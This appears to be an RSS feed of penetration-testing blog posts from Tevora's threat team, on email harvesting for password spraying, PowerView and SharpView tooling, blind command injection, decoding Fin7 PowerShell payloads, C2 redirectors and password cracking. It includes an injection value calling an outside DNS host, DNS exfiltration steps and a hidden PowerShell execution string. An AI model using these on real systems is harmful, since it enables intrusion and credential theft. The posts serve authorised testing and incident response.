https://threat.tevora.com/Ghost 0.11Thu, 01 Nov 2018 12:04:41 GMT60During an engagement, having an email list for your target can be useful for a variety of reasons. When it comes to social engineering and password spraying, more email addresses translate to higher chances of success. While some clients will provide an employee directory, for others it may be necessary]]>https://threat.tevora.com/email-enumeration-with-prowl/14b42928-8297-4691-af1c-45aed1370ac4Tue, 31 Jul 2018 13:46:00 GMTDuring an engagement, having an email list for your target can be useful for a variety of reasons. When it comes to social engineering and password spraying, more email addresses translate to higher chances of success. While some clients will provide an employee directory, for others it may be necessary to use other resources to obtain a working list.

Old School

Traditional email reconnaissance tools such as theHarvester work by scraping multiple search engines for any addresses that match a user-provided domain. However, depending on the online presence of the organization, these types of tools may only find a few or none at all. Running theHarvester against tevora.com with all options enabled didn’t turn up any useful results.

Nothing useful here

New School

While a company as a whole may be good about keeping the net clear of usable data, their individual employees usually aren’t. Social media has increasingly become useful for OSINT and it would be foolish to ignore it. An email harvesting tool using a different approach, Prowl, written by Matt Pickford, takes advantage of employees sharing about their workplaces online to compile usable email lists.

Prowl works by scraping Bing and Yahoo for the LinkedIn profiles of people who currently work at the target organization, then converts their names into email addresses following a preconfigured format. Since people are much more likely to disclose their employer than their work email this often pulls significantly better results.

Two caveats, however: Prowl requires knowledge of the address format in use by the organization and the resulting emails are not guaranteed to be valid. The first issue can be solved by enumerating enough emails the traditional way (such as with theHarverster) to determine the structure, or, more easily, by looking at the contact info for the client. For the second issue, some addresses can be manually fixed if the LinkedIn user entered their name in a nonstandard way, otherwise there’s no other way to know if the organization deviated from the standard convention when creating the individual’s account. Fortunately, the quantity of valid addresses will usually outnumber the false positives.

The Test

Configuring Prowl is straightforward, with the company specified with the -c flag and the email string with the -e flag. Names or initials are inserted as variables such as <fn> for first name and <li> for last initial. Search depth measured in search engine pages can be set with -d.

./prowl.py -c Tevora -e "<fn>.<ln>@tevora.com" -d 10

No point in censoring when you can run it for yourself

Of the results from searching against Tevora, more than half of the emails generated were legitimate. Considering the lack of hits generated by theHarvester, this is definitely an improvement. Most of the false positives were from people no longer with the company, not incorrect generation, so this is hardly the tool’s fault. Overall, Prowl provided valid emails for nearly half of the organization, which is both impressive for the tool and an interesting commentary on the impact of social media.

]]>Any red team looking to improve is constantly adapting, changing their tactics and implementing new techniques & procedures. To many professionals in the industry, this is known as Tradecraft – a term that resonates with me. Previously, I had written about various tools that are used by the Tevora Threat Team]]>https://threat.tevora.com/a-sharpview-and-more-aggressor/501cf68d-5d67-4872-a26e-f247a41497a5Tue, 24 Jul 2018 21:10:46 GMT

Any red team looking to improve is constantly adapting, changing their tactics and implementing new techniques & procedures. To many professionals in the industry, this is known as Tradecraft – a term that resonates with me. Previously, I had written about various tools that are used by the Tevora Threat Team such as PowerView and Cobalt Strike. Something that we have seen dominate the post exploitation scene is PowerShell due to its power for lack of a better word. PowerShell offers an adversary major offensive capability, making it a popular choice for post exploitation activities. However, with how much attention that it has gotten Microsoft has made great strides in hardening PowerShell against offensive use. As a result, the use of PowerShell can sometimes lead to a higher chance of getting caught, thus not always being able to take advantage of feature filled go-to’s like PowerView - a gift that seems to keep on giving.

In Cobalt Strike 3.11 we saw a new feature introduced into the tool called execute-assembly which gave the ability to execute C# assemblies in memory. This is a great concept for red teamers to start re-modify their toolset and push post exploitation away from PowerShell and toward other avenues. Today we are releasing SharpView which is a .NET port of one of our favorite tools PowerView. SharpView offers the ability to use any of the PowerView functions and arguments in a .NET assembly. If you're familiar with PowerView, SharpView will be easy to pick up.

In addition to releasing SharpView we are also releasing an aggressor script for PowerView 3. The script will provide a graphic interface to use PowerView and SharpView all in one. This is very similar to the last PowerView aggressor script that was released with a few changes. This aggressor script now supports PowerView 3.0 (current Dev branch) and like last time has the ability to select either PowerPick or PowerShell for the execution method. Adding to the execution method is the implementation of SharpView that leverages execute assembly.

However, there is a caveat with using SharpView. One of the awesome things about PowerShell and PowerView is the ability to pipe commands. As of right now there is currently no way (that I know of) that would allow for commands to be piped with execute-assembly.

One of the things that PowerView 3.0 offers that was not widely used in PowerView 2.0 was the ability to create and use credential objects and simulate 'runas'. The latest aggressor script offers the ability to take a credential from Cobalt Strike "domain\user password" and parse it into a credential object.

The format for the credential differs between PowerShell, PowerPick, and Execute-Assembly but to the end user it does not make a difference as long as it stays in the format of "domain\user password". Something to be aware of is the credential being used will be in the command much like the examples in PowerView. Finally, the script has a help button that gives the description of the function and the parameters (what is given in the PowerView.ps1 source).

This post will walk through the process of automatically decrypting a LUKS encrypted drive on boot using a chain of trust implemented via Secure Boot and TPM 2.

Background

The Tevora Threat Team uses deployable devices for remote testing. The current generation of these devices consist of commercial off the shelf mini PCs with the Unified Extensible Firmware Interface (UEFI), Secure Boot and a Trusted Platform Module(TPM) available.

In order to better protect these systems during transit and while deployed, as they can potentially contain sensitive information, the use of technology available on these devices was evaluated. Initial evaluations showed that making use of the on-board TPM and Secure Boot capabilities were viable, if possibly reliant on bleeding-edge software. This post will discuss a simple, best-effort setup with custom Secure Boot, and encrypted storage unlocked via the platform's TPM, touching only briefly on the details of distribution-specific implementation.

The Plan

The idea is to use a custom Secure Boot configuration to provide complete boot chain authentication, and to use the TPM to restrict access to filesystem cryptography keys unless the device is booted with a proper boot configuration. The devices Tevora uses have no functionality available for freezing or restricting access to Secure Boot configuration: Even with a BIOS management password set, it can still be reset via onboard jumpers, allowing a potential attacker to easily disable Secure Boot, thus requiring both Secure Boot and TPM policy in order to maintain platform security.

Secure Boot Setup

As it turns out, setup of a quick and simple custom Secure Boot configuration can be made relatively straightforward. This requires the efitools package. First, we generate the Secure Boot keys. Make sure to treat these keys with caution, as with these keys, a potential attacker could perform decryption of all devices. The Secure Boot private keys should only ever be used to sign new boot configurations if a kernel/initramfs update is required.

Next, we will generate and sign a secure boot chain. One of the quickest ways to do this with all bases covered is to use the shim efi binary available as part of systemd-boot. This binary can be used to generate a single EFI binary which contains the kernel, initramfs, and command-line, disallowing the user from making any boot configuration changes assuming a secure configuration of the installed OS.

Boot keytool from the efitools package available at /usr/lib/efitools/x86_64-linux-gnu/KeyTool.efi to load the corresponding .auth files into the key slots

Reboot. At this point, the device should only accept binaries signed via the above method

TPM2

The devices in question contain a TPM 2, which is not supported very well in common Linux distributions. For instance, on the latest Kali rolling at the time of this post, tpm2-tools and associated software are available, but the versions provided are incapable of interacting with the TPM of our devices.

While the software is straightforward to set up, documentation is somewhat lacking on usage at a higher level beyond low-level interactions with the TPM, and command syntax has been changed many times since tutorials and documentation were written.

TPM Usage

Now for the interesting question, can we effectively use the TPM to suit our needs for unlocking encrypted storage?

It would appear that there are essentially two simple methods of accomplishing this:
1. Storing key data in TPM NVRAM, and restricting access to the NVRAM object with a policy
2. Storing as a persistent TPM Object with an a policy restricting access

Of these options, Tevora chose the later as the current iteration of tpm2-tools does not seem to support policy based access to nvram.

The TPM2 contains a set of PCRs, or Platform Configuration Registers, which contain hashes of boot-time configuration.
Example (Dummy PCR Values):

TPM2 has the ability to create policies based off of PCRs: If the PCR contents do not match expectations, the policy will not authorize the action. The individual PCR values have various meanings and may be platform specific. For the devices in question, we determined that locking PCRs 0,2,3, and 7 would be suitable, with the option of locking PCR 1 to freeze the BIOS configuration. PCR 7 contains a hash of secure boot configuration. For the tpm2-tools, this PCR list is represented as: sha1:0,2,3,7

Using this information, we can create a sequence of TPM commands to initialize the TPM and store our secret, protected by a policy locking the PCRs:

Reset TPM If Required

Our devices come from the factory with the TPM locked using an unknown password. In addition, the factory specified procedure for resetting the TPM does not appear to work on these devices. The best solution we discovered for our device was to perform a recovery BIOS flash, which would reset the TPM to a blank state with no password.

In theory, this can be accomplished from software via the tpm2_clear command, if the required password is known

Encrypted Partition Unlocking Via TPM

To unseal our secret only requires a single command, using the object's persistent handle and our list of PCRs:

tpm2_unseal -c 0x81000000 -L sha1:0,2,3,7

This can be integrated to provide decryption depending on the distribution and requirements. For instance, in Kali and other debian derived distributions, TPM2 functionality can be added to the initramfs via hooks for initramfs-tools:

Use update-initramfs -u to regenerate the initramfs. Remember, we will need to regenerate our combined boot chain and resign after changing the initramfs.

Using TPM from initramfs

Due to the lack of a full system environment, for this purpose, it was chosen not to run the tpm2 resource manager, tpm2-abrmd in the initramfs, as only a single TPM command is needed to perform the unseal, without the use of context memory.

The TPM2 resource manager is required to perform sequences of multiple TPM2 commands in many cases, as the TPM has limited available memory.

To bypass the resource manager, change the interfaced used by tpm2-tools to the device file: export TPM2TOOLS_TCTI="device:/dev/tpm0"

Unlocking Volume

Naturally, multiple options are available across various distributions for performing disk unlock. The following is a simple example configuration for Kali Linux, and likely other Debian derived distributions using the TPM to unlock a LUKS encrypted partition:

For use in a production system, the latest versions of the tpm2 tools should be properly packaged. This step is distribution specific, and is left as an exercise to the reader. Hopefully more recent tpm2-tools can be up-streamed soon, but with the command syntax seemingly changing from week to week, it is evident why later versions have not gone into standard use.

Caveats and Potential Improvements

Using a single object can only store key sizes of 128 bits, possible workarounds:

Use multiple objects to store parts of key

Use NVRAM based key storage (pending on tpm2-tools policy support)

TPM Security

TPM2 has not been analyzed to the level as TPM1 has been

Full validation of our methods has not been performed

Additional TPM functionality

Only minimal TPM functionality is discussed in this post

Plenty of additional capabilities/features not expored

Key Safety after Unseal

Ideally, measures to prevent the key from being kept in memory should be implemented

]]>In this post we will demonstrate how Burp Collaborator can be leveraged for detecting and exploiting blind command injection vulnerabilities.

Burp Collaborator is an excellent tool provided by Portswigger in BurpSuite Pro to help induce and detect external service interactions. These external service interactions occur when an application or system

In this post we will demonstrate how Burp Collaborator can be leveraged for detecting and exploiting blind command injection vulnerabilities.

Burp Collaborator is an excellent tool provided by Portswigger in BurpSuite Pro to help induce and detect external service interactions. These external service interactions occur when an application or system performs an action which interacts with another system or service...eazy peezy. An example of an external interaction is DNS lookups. If you provide a hostname to a service, and it resolves that hostname, an external service interaction has likely occurred.

While Burp Collaborator has many use cases, today we'll explore a specific use case -- detecting and exploiting blind command injections.

Command injection vulnerabilities occur when user-controllable data is processed by a shell command interpreter -- the information you submitted to the application was used as part of a command run directly by the system.

Command injection vulnerabilities are serious findings, as they allow an attacker to execute commands on the underlying system hosting the web application.

Let's take a look at how Burp Collaborator could be used to help us detect and exploit the more difficult form of command injection vulnerabilities, blind command injections.

In blind command injection, we don't see any output from our injection attacks, even though the command is running behind the scenes. We generally see detection performed via payloads which cause the system to perform a noticeable action like sleep (time-based), or perhaps ping another server under our control.

Sleep Command Injected - Response Time Observed

Ping Command Injected

Ping Response Observed

With Burp Collaborator, we can often use its DNS service interaction to find these vulnerabilities a bit more easily. We're likely already using BurpSuite to assess the application, so it makes sense to leverage Collaborator.

If we can induce our target to perform an external service interaction via a command injection, we can use Collaborator to confirm it.

So you think you have a shot at blind command injection? Start up the Collaborator client!

Grab a Collaborator payload by copying it to your clipboard:

It will look something like this: 255g0p3vslus8dt7w02tj4cj8ae22r.burpcollaborator.net

Fun fact: the nslookup command uses similar syntax on Windows and Linux, making it a perfect candidate for cross-platform blind command injection tests. Just insert nslookup $collaborator-payload into your usual test cases. If a DNS lookup is performed on your payload, you'll be notified by Collaborator.

But we see the response to our injection received by the Collaborator client, confirming we have command execution.

Awesome.

Let's take it a step further. What if we wanted to exfiltrate some data? Perhaps we're unable to gain a shell from our injection attempts, and we need to figure out why -- or we just want a better proof of concept for our report.

Collaborator gives us a really simple and effective option for this, without leaving BurpSuite to setup additional tools during a test.

We can use Collaborator to pull back some details about the target by appending system data to the beginning of the DNS lookup. Collaborator will accept lookups to any subdomain requested on the payload (keeping in mind 63 character limits for subdomains, and 253 character limits for the overall DNS lookup).

]]>Tevora employs a lot of different tools depending on what our need is. During penetration tests and red teams one of the most common that is used is PowerView from PowerSploit. PowerView is an excellent tool in performing reconnaissance in Windows environments and provides a wealth of value. The functions]]>https://threat.tevora.com/aggressor-powerview/95582b37-31ae-472d-8442-3652e6e19757Thu, 22 Mar 2018 18:08:44 GMTTevora employs a lot of different tools depending on what our need is. During penetration tests and red teams one of the most common that is used is PowerView from PowerSploit. PowerView is an excellent tool in performing reconnaissance in Windows environments and provides a wealth of value. The functions inside of it provide an alternative to native Windows commands that may get flagged by various detection tools making it a great alternative. An example of this would be rather than executing net user admin /domain (which would most likely trigger alerts) you could do Get-NetUser -UserName admin which would use Active Directory Service Interface and Lightweight Directory Access Protocol. This is a very simple example of what can be done with PowerView but it highlights some of its usability. In addition to some functionality that can be performed with native Windows commands there are a handful of custom functions in it as well that are extremely useful.

Another tool that is commonly used by Tevora's threat team is Cobalt Strike. Cobalt Strike offers a lot of great features in it as well and is a common go to tool for red teams. One of the great features of Cobalt Strike is the scripting language called Aggressor that is built into Cobalt Strike which allows people to extend functionality for their needs.

One of the things that Tevora has done is created an Aggressor script which created an interface for using PowerView within it. Tevora has released this Aggressor script putting it on GitHub which can be found here. This Aggressor script allows for end users to get a GUI interface for all of the functions built into PowerView.

This is broken up the same way harmj0y broke it up on the PowerView README page.

While interacting with a Cobalt Strike beacon a user can right right click and see all the PowerView options available. With the amount of functions that are built into PowerView it is easy to forget what is available to you which a lot of times prompts users to open up the .ps1 file and read through the code/options. One of the things that is good about this is the ability to see right away everything available and to read a quick synopsis of the function.

The boxes within the interface indicate data that will be used for the PowerView functions while check boxes indicate switches in the functions. Additionally, users can select whether they use PowerPick (Unmanaged PowerShell) or PowerShell to execute their PowerView functions which gives a little more customization to what the end user wants to do.

There are a lot of different ways that PowerView can be used in PowerShell commands with execution of multiple functions at once to get specific data. Unfortunately in its current state this script does not offer the ability to do those things but simply offer the end user an interface to user PowerView and an easy way of remembering all functions and arguments for said functions. One of the things to note is this script does not automatically perform a powershell-import on PowerView.ps1 within Cobalt Strike so when using it users should always make sure it has been imported beforehand or are interacting with a beacon where it is imported.

]]>TL;DR Here's how to decode some PowerShell commands so you can find IPs and other IOCs.

Background

Through consulting with several of our clients during IR engagements, we have discovered that several clients are taking steps to restrict and log PowerShell in their environment. However, in several engagements we

TL;DR Here's how to decode some PowerShell commands so you can find IPs and other IOCs.

Background

Through consulting with several of our clients during IR engagements, we have discovered that several clients are taking steps to restrict and log PowerShell in their environment. However, in several engagements we have discovered that many of the analysts are unable to get the correct information from these logs to begin containment or investigate further. Understanding these commands that are wreaking havoc in your environment is critical to the incident response process.

Understanding Common PowerShell Exploits

Let's take a look at a common PowerShell exploit structure and break it down to better understand what's going on. Fin7, and copy cats, like to use this method (A LOT) so it's a good place to start:

In a nutshell: the payload calls PowerShell, gives it some flags to make sure it executes, sets a command alias 'a', and provides the true payload to be decoded and executed.
The first section of the command calls PowerShell and some flags:

powershell.exe -NoE -Nop -NonI -ExecutionPolicy Bypass -C

These options are:

NoE - NoExit

Doesn't exit after running the command, i.e. creates a process and stays running as powershell.exe

NoP - NoProfile

Doesn't load the PowerShell profile

NonI – NonInteractive

Doesn't create an interactive prompt, i.e. it runs the command without the PowerShell window popping up a persistent terminal on the user's screen

ExecutionPolicy Bypass

Bypasses the execution policy if it is set (self-explanatory)

C - Command

What to run (again, pretty self-explanatory)

This section allows PowerShell to execute a command that will be invisible to the user and create a process that stays running after the command executes.

The second portion of the command is where things get interesting, and this is where the actual forensics begins:

The Set-Alias cmdlet 'sal' creates a shortcut 'a' for New-Object. The subsequent section uses the Invoke-Expression cmdlet 'iex' to execute the payload, which consists of the alias 'a' and some classes to convert a base64 encoded string to a memory stream. So, the command executed is actually this:

Honestly, it sounds more complicated than it really is. It just reads a string in to memory and executes it. There's not a ton going on in this command, but once you understand it, you can modify it to make it output the real information you want.

Modifying the Payload to Identify its Contents

We know the payload is reading something in to memory and executing it so, here's an idea, let's just read it and NOT execute it. So, what's causing the execution? In the section above, we identified the call to PowerShell with the flags, and 'IEX' cmdlet. Here's the magic: ALL YOU NEED TO DO IS REMOVE 'IEX', THE DOUBLE QUOTES, AND THE FLAGS!!!!

Once you remove the execution commands (powershell.exe -NoE -Nop -NonI -ExecutionPolicy Bypass -C, "", and iex) from the payload you're left with:

This payload is now safe to run in PowerShell. All it does now is set the alias 'a', and read a string in to memory. Here's a look at an actual payload from Fin7, and how we used this same method to identify one of their C2 servers:

Once you remove the "powershell.exe -NoE -Nop -NonI -ExecutionPolicy Bypass -C", "iex", and wrapping double-quotes, the payload will decode the string and print it to the screen. It really is that simple. Just remove the "execution" from the command, and it becomes a benign payload.

What you need to focus on, is identifying the execution within a command. Once you find all the executable calls, you can delete them or replace them with non-executable functions, such as writing out to text files. The above example is simple because the IEX command is in plain sight, and the attackers make no effort to further obfuscate their payloads.

Be diligent in examining the command before running anything. We recommend taking it one step further and using a VM with no network access, when attempting to run these payloads as demonstrated. You don't want to gift an attacker a shell with admin privileges while you're investigating!

Further Investigation

The command from our example spawns a Meterpreter shell, as seen in this snippet from the decoded payload:

While there are plenty of other C2 frameworks, attacker methodologies are similar and almost always include the following: establish C2, establish persistence, dump creds, and pivot. It's fair to assume that this is just the beginning, and after this payload is run, there will be a healthy dose of Mimikatz, pass-the-hash, wmi-exec, etc.

Some tips for following up after discovering a payload like this would be:

Don't block the IP just yet. You want to identify all affected systems and determine if multiple C2's are being used. Attackers like Fin7 have been known to use between 3-5 different C2's for a single attack.

Do a quick investigation on any other affected hosts, so that you can give them the ban-hammer all at once. Otherwise you could end up playing whack-a-mole for a while.

Review logs for all devices that connect back to the attacker's identified IP

Review all internal connections to and from the affected host (especially SMB traffic)

Review all external connections to and from the affected host (including DNS traffic)

Review anomalous or suspicious activity from these hosts, such as connecting to dropbox, google docs, etc., to determine if data was exfiltrated.

Don't start recovery until it's certain the threat has been removed. The last thing you want to do spend a ton of hours recovering (resetting passwords, reimaging, etc.) and then have to do it all over again for the same incident!

This blog will cover what redirectors are, why they are important for red teams, and how to automate their deployment with Ansible. This is the first post in our RTOps blog series, and will serve as a jumping off point for further redirector strategies, and Red

This blog will cover what redirectors are, why they are important for red teams, and how to automate their deployment with Ansible. This is the first post in our RTOps blog series, and will serve as a jumping off point for further redirector strategies, and Red Team infrastructure automation

What are redirectors

Redirectors sit in front of our actual C2 servers, and securely proxy command and control traffic from the target back to our C2 listeners. These prevent the client from being able to see our actual C2, and should be easy to spin up and tear down.

Redirectors come in many forms, from hop.php applications popularized by Metasploit and Empire, to something as simple as socat

We are going to focus on deploying a C2 using hop.php AND/OR mod_rewrite, allowing the redirectors to support Empire and Cobalt agents with the following features:

Proxy traffic to our C2 servers

Redirect or proxy unwanted traffic away from our c2 servers

Have legimate publicly signed certificates with communication over https

To meet all these goals, Apache with mod_rewrite is an excellent choice.

Redirecting using mod_rewrite

Mod_rewrite is a great component of Apache that allows us to transparently proxy or redirect requests based on regular expression matches. This could, for example, allow our evil 'amazonss.com' site redirect or proxy traffic to 'amazon.com', making it appear legit, unless traffic matching our C2 hits the server, in which case mod_rewrite will transparently proxy the request to our C2 servers.

@bluescreenofjeff has an awesome writeup on how to do this. Rather than cover what Jeff has already, this blog will go over how to deploy redirectors using his method, and a few tweaks to work better with ansible and lets-encrypt.

Automating Redirector Deployment with Ansible

To deploy our redirectors, we will be using Ansible, a configuration management tool comparable to puppet, chef, and fabric. Ansible is nice because is it agentless and works completely over SSH. We are introducing ansible now as we will be baking many of our commands and configurations into Ansible configs, so will be covering both redirector setup and Ansible features as we go.

Ansible Primer

If you already know ansible, feel free to skip this section. For those that don't, this section is mostly guidance on which portions of Ansible's documentation you need to read or reference to understand the configurations we go over in this post.

Playbooks
Ansible uses config files in YAML format to specify actions it takes on remote servers. These configurations are called 'playbooks'.

We leverage this in our automation by creating a redirector role, which consists of all the legwork to spin up and configure a redirector. Our playbooks to deploy specific redirectors largely consist of variables to be passed to this role. This allows us to separate the configuration of a unique redirector instance from the general process of setting up a redirector.

If you don't fully follow the documentation for ansible roles, don't worry. Most of this post will go through creating the redirector role, so you can learn by example.

Ansible Redirector Role

Requirements

Alright, we are almost ready to dive into creating our Ansible Role to facilitate redirector provisioning. First, lets walk through some formal requirememts of our role so we know what tasks we need to implement:

Apache Installation: We need to make sure we have apache installed with the proper modules

Apache Configuration: We need to setup configurations for our redirectors. We can use vhosts for per domain configuration

Copy Hop.php File(s) to Server: We need to get our hop.php file to the server if using that method of redirection.

Redirector Rules: We need to install the redirector rules. We can do this in our apache config's vhost section instead of .htaccess files

Lets Encrypt Installation: We need to install lets encrypt on the target servers and python-certbot-apache

Lets Encrypt Configuration: We will want let's encrypt to setup legit public certs for our sites.

Ok, we've got a pretty decent list to get started on. Lets start making our role.

Role Structure

We wont need all these folders for our role, but it is good to layout the initial structure before we start work. Each folder has special meaning in the context of a role. Most importantly, the tasks folder will contain all the tasks we want to run. When you import or include a role in a playbook, it will execute the file main.yml in the tasks folder.

We could put all our tasks in that main.yml file, but it would be better top break them out into multiple files for readability and re-use. Looking at our requirements list, we can see our tasks break down into two general categories: setting up apache, and setting up lets config.

We can 'include' the apache and letsencrypt files in main.yml, allowing them to be run when we use the redirectors role.

main.yml

---
- include: "apache.yml"
- include: "letsencrypt.yml"

Right now both apache.yml, and letsencrypt.yml are empty, so using the role will not do anything. However, we now are ready to start implementing our tasks in those two files.

Setup Apache

Installation

Installing modules in ansible is a cinch. To keep it even simpler, we will just be supporting debian based systems with this role. We can leverage the 'apt' task to make sure apache and required dependencies are installed on our target server.

Our apache.yml file now will install apache, php, and libapache2-mod-php.

Next, we will append the following to our apache.yml to enable the headers, rewrite, proxy, ssl, proxyhttp, and php7.0 mods. We will also disable moddeflate and mod_cache to ensure our redirector doesn't encode or otherwise process our C2 traffic in undesireable ways. apache.yml continued

Now when we have the hop_dir variable defined in our redirector instance playbook, it will copy the contents of that directory on our local host into the root of our site.

Before we go any further, we need to cover how variables will be layed out in our instance playbooks, and how they interact with our role. Let's do that by walking through a completed playbook that will setup our redirector instance using our redirectors role.

OK, that was a lot to cover, but hopefully this config file and layout is making sense. We formatted this config mostly in JSON (YAML is a superset of JSON) but you can format it however you like as long as it matches up.

Notice in the config how there are multiple vhosts, and each one can use one or more methods of specifying the config

Back to the Role: VHOST Configs

With a schema decided for our redirector Role variables, we can move back to developing the role.

Now, we will set up our vhost configs. This is a bit more complicated than our previous tasks as we will need to not only add a task but include templates to define the config files.

These template files will allow us to build most of the config file, and dynamically replace portions with it based on our ansible variables.

First, lets create the tasks to instantiate the templates and copy them to the server.

These tasks:
1. take in the specified template files
2. for EACH vhost in vhosts, do the following:
a. pass them the 'vhost' variable which will be named 'item' in the template
b. Run the Jinga 2 templating engine
c. Copy the output to the apache directory on the server with the filname prefixed rt_ for http sites, rtssl_ for https sites and appended with the servername for the vhost.

The reason we create one configuration file per vhost is that Letsencrypt, specifically the certbot-apache component, does not support more than one vhost per config file. Because of this we will be provisioning multiple configuration files to the server.

Now lets create the SSL and HTTP templates. Make the template files and place them in your templates folder so that your directory tree should now look like:

These tasks will disable all existing sites, to prevent having more than 1 vhost per config file and breaking lets encrypt. Then, all the red team sites will be enabled. Boom, we now have our apache sever stood up with all the proper configs!

Ok, thats it! We've done it! We've developed a role that allows us to quickly deploy a redirector to an existing server!

Next steps are to run the role. Create your playbook in the form of the example we covered and run ansible-playbook -i <your_hosts_file> <your_playbook>. Ensure that this roles is in the roles directory in the same path of your playbook, and your hop and/or config files are placed correctly. Your directory layout should look like:

Closing Thoughts

This redirector configuration automation is just a basis for our red team infrastructure automation. By building on this substrate, we can build powerful tools to bring up C2 servers quickly and effectively. Next post we'll discuss how we can automate the server creation itself and provision these redirectors based on dynamic Terraform state files. See you then.

]]>Release

We are releasing the SecSmash tool we announced at BSIDES LV. SecSmash is a framework that allows you to turn centralized management, monitoring, and security tools into C2 infrastructure. Check out the tool on Github: https://github.com/tevora-threat/SecSmash

We are releasing the SecSmash tool we announced at BSIDES LV. SecSmash is a framework that allows you to turn centralized management, monitoring, and security tools into C2 infrastructure. Check out the tool on Github: https://github.com/tevora-threat/SecSmash

Secsmash is a modular framework for leveraging credentials to enterprise security tools to own the enterprise. Instead of spinning up your own C2 on a pentest, leverage the C2 that organizations have already deployed.

The Framework

We've built an HTTP integrator that takes inputs, and extractions to generate new inputs, to drive a chain of HTTP request to authenticate to the target system, enumerate connected hosts, and run commands.

Integrations can also be built from scratch if they match the Integrator interface.

We will be shoring up our documentation in the coming months and are hoping to see community involvement in module creation and sharing!

]]>Background

Password cracking is a crucial part of a pentest. It can either lead you to the promised land, or stop you dead in your tracks. Password cracking is somewhat of an art, but there are some ways to make the process objectively better, so you can focus on more

Password cracking is a crucial part of a pentest. It can either lead you to the promised land, or stop you dead in your tracks. Password cracking is somewhat of an art, but there are some ways to make the process objectively better, so you can focus on more pwning. We'll discuss how you can take a budget build and turn it in to an effective tool for your pentesting arsenal.

To effectively crack passwords, you need to focus on 3 things:

The Hardware

The Wordlists

The Rules

The Rig

Our day-to-day rig is a GPU powerhouse, but that's just not feasible for the hobbyist password cracker, and there are already plenty of great blog posts on building multi-thousand dollar cracking rigs. No use beating a dead horse, with another build blog.

However, for around $1200, you can build a decent rig around a single Nvidia GEFORCE GTX 1080 Ti.

The rest of the hardware doesn't need to be very special. This is what we recommend to build a rig on a budget:

Nvidia GEFORCE GTX 1080 Ti

This is going to be the most expensive piece of the rig at about $700.

250-500GB SSD

SSD increases wordlist read speed, and they're getting cheaper by the day. Splurge if you can.

Intel i5 or i7 CPU

You're not gaining much performance by going to the i7, but if you got a little extra $$, go for it.

16GB RAM

RAM is cheap, buy as much as you can afford and fit in your motherboard

The special of the week motherboard and case combo from you favorite (local/online) hardware vendor

You favorite linux flavor, and a copy of hashcat

Depending on how frugal you are, the rig will probably cost about $1200-$1500. Keep in mind that $700 of that cost is the GPU alone. This isn't too bad considering it's anywhere between $50 to $200 per day to run an AWS g2.8xlarge instance. Another nice benefit is that a single 1080 Ti, performs faster than the AWS g2.8xlarge instance. So, it's an all-around win if you're currently using a hosted cracking instance. Nothing against using AWS, it's just a better investment to build your own rig if you're planning on using it frequently.

We used the budget build hardware to run our test cases, so that we could show how effective this rig can be with the right wordlists and rules.

Finding the Perfect Wordlists

After putting together the hardware we needed to focus on finding the right wordlists to bring our cracking rate up to an acceptable percentage.

When we started building a test case for this blog, our original goal was to have a 33% crack rate. We use Responder during internal pentests, so cracking 1 out of every 3 NTLM hashes almost guarantees us a path to domain admin. This was our starting goal. To test this, we gathered 40 NTLMv2 hashes from recent pentests.

After some Googling and a little bit of trial and error, we found our wordlists. Here are the top 3 performers, from publicly available wordlists:

Yes, there are others that are bigger, but in our test case these were most effective when considering the time to number of cracks ratio.

Weakpass 2.0

Weakpass 2.0 is a combination of several dumps and available wordlists. This wordlist is huge, weighing in at 28GB. Weakpass 2.0 had the highest standalone crack rate with 14 of the 40 hashes cracked. That's 35% right from the start.

It takes about 4 minutes to run through the weakpass 2.0 wordlist with (1) 1080 Ti. FYI, there's a bit of time taken to cache the wordlist when hashcat first starts. However, this is VERY dependent on the supporting hardware.

There is also a "Weakpass 2.0 A", but this wordlist isn't worth it in most cases:

"A" is 85GB compared to 2.0 at 28GB. Meaning it takes 3 times longer to run through.

"A" has a 66.88% crack rate according to their site, as opposed to a 65.16% crack rate with 2.0. Only a 1.72% difference in crack rate, with a 66% difference in size.

"A" contains 4-character passwords, while 2.0 only 5+ character passwords. 4-character passwords are not common for most organizations, and easy enough to brute force.

Stick with weakpass 2.0 for the best bang-for-your-buck. The time to crack rate ratio is better with 2.0.

Crackstation

Crackstation is another combination wordlist, weighing in at 15GB. This is a solid wordlist that had a standalone crack rate of 27.5% in our test case.

It only takes about 2 minutes to run through it, so it's worth giving it a shot. This wordlist is pretty stagnant, but it has been a solid performer for 2+ years now. We like it, it works, and you should check it out.

Rockyou

The RockYou wordlist is from the Rockyou.com breach. It was the largest dump of plaintext passwords at the time, and has been a quick go-to for several years now. It comes default with Kali Linux and, compared to the others above, it's tiny weighing in at only 139MB. It takes only (1) second to run through it. It takes longer to type out the actual command to run it… The initial crack rate is unimpressive, at 7.5% in our test case, but it runs so fast that it's worth a check.

Adding Rules for Better Results

Hashcat has the option to run "rules" against the wordlist, which mangle the words and create more possibilities for cracking. Hashcat comes packaged with several great rules. There are also some community generated rules that are quite useful as well, and most of these get incorporated to the hashcat master branch.

After a couple days' worth of running wordlists/rules combinations and a ton of waiting, we found the most effective wordlists for our test case:

Append_d: adds numbers to the end of a password, i.e. Password -> Password77

Append_s: adds special characters to the end of a password, i.e. Password -> Password!

Leetspeak: changes passwords to leetspeak, i.e. password -> p4$$w0rd

Append_d

Append_d is by far the most effective rule. It added an average of 10% more cracks to each wordlist it was paired with. We'll look at why that is, later in this post, when we analyze some cracked/dumped passwords.

Append_s

Append_s was also pretty effective, adding an average of 6% more cracks to each wordlist it was paired with. This number isn't jaw-dropping, but it could be the difference between pwning or complete frustration.

Leetspeak

The leetspeak rule is moderately effective, only adding about 2.5% more cracks to each wordlist it was paired with. However, those passwords have often been admins or service accounts in our recent experiences, so it's worth an extra run through the gauntlet.

Test case results

Here are the final results from our test case of 40 NTLMv2 hashes:

Analyzing Cracked Passwords

After cracking passwords from our pentests, we like to analyze the password profile to better understand how users generate passwords. To do this, I wrote a quick python script to read the passwords from a given file and spit out some percentages: https://github.com/dank-panda/password-analyzer.py (There is definitely work to be done here, but it'll give you some decent insight for now).

To start, we dump some passwords from a couple recent pentest and run the script against them. python password-analyzer.py wordlist.txt

We see that 70% of the passwords we analyzed start with an uppercase letter. This isn't a really big surprise. It seems logical to capitalize the first letter, just like we all do for the beginning of a sentence. It's a common practice.

Next, we see is that 61% of the passwords end in a number. This was a surprise to me. I thought that a special character would be the most common, but I was way off the mark on that assumption. It seems reasonable though, given the amount of "Password1" passwords we see. Now we see why the append_d rule was so effective.

